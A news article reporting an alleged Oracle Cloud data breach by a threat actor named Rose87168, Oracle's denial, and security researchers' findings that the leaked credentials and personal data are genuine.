Oracle Hid Serious Data Breach from Customers, Now Hacker Has It Up for Sale

Oracle Hid Serious Data Breach from Customers, Now Hacker Has It Up for Sale

Data breaches have become a harsh reality in today's digital age. Companies and organizations announce data breaches every month, leaving customers feeling frustrated and exposed. However, it gets even worse when the company tries to hide the breach, making it harder for them to take responsibility.

Earlier this month, a threat actor claiming to be Rose87168 claimed to have breached Oracle Cloud's federated SSO servers, exfiltrating around 6 million records and affecting over 144,000 Oracle clients. The hacker threatened to sell the data unless clients paid to remove their data from the trove, which included sensitive information such as single sign-on credentials, Lightweight Directory Access Protocol passwords, OAuth2 keys, tenant data, and more.

Rose87168 has also solicited help from the hacking community to crack the hashed passwords in trade for some of the data. A day after the threat actor posted a small sample of the data, Oracle told Bleeping Computer there was no breach of its cloud service. However, upon Oracle's denial, Rose87168 began leaking "proof" to the media and security researchers.

Security group Hudson Rock and experts at CloudSEK concluded that the data and credentials are legitimate. CloudSEK said that the hacker appears to have used a zero-day vulnerability (CVE-2021-35587) in an access manager software related to Oracle Fusion Middleware to breach Oracle Cloud systems without authentication.

"Pretty crazy Oracle just denied this leak, which has been verified independently by many cybersecurity firms," Hudson Rock CTO Alon Gal posted on LinkedIn on Monday. Trustwave SpiderLabs also reviewed the evidence and concluded that the data was definitely from Oracle Cloud servers.

The security firm also confirmed that the cache included personally identifiable information such as first and last names, full display names, email addresses, job titles, department numbers, telephone numbers, mobile numbers, and even home contact details. The hacker also uploaded a recording of an internal Oracle meeting. "Such data in a leaked format poses severe cybersecurity and operational risks to the affected organization," Trustwave added.

Cybersecurity specialist Kevin Beaumont noted that Oracle "rebadged" legacy Oracle Cloud services as "Oracle Classic." He claims that the company's careful wording in its response is a technically factual but disingenuous denial. The company appears to be attempting to situate the incident as insignificant or that it didn't leak current Oracle Cloud records.

For reference, here is Oracle's statement to Bleeping Computer: "There has been no breach of Oracle Cloud. The published credentials are not for the Oracle Cloud. No Oracle Cloud customers experienced a breach or lost any data."

Beaumont found the repetitious use of "Oracle Cloud" suspicious as if it might be setting up Oracle Classic to take the fall. However, regardless of the age of the breached servers, CloudSEK confirmed through some of its clients that the data was accurate and current. This conclusion debunks any notion that the breach was insignificant or contained outdated information.

Despite multiple researchers reporting that the data breach is seriously concerning, Oracle has remained silent since it denied the attack. Beaumont says the company's silence is irresponsible. Likewise, Gal called Oracle's lack of transparency and guidance "crazy."

Lacking any advice from the company, Gal directed affected customers to CloudSEK's mitigation recommendations to minimize any potential damage from the leak.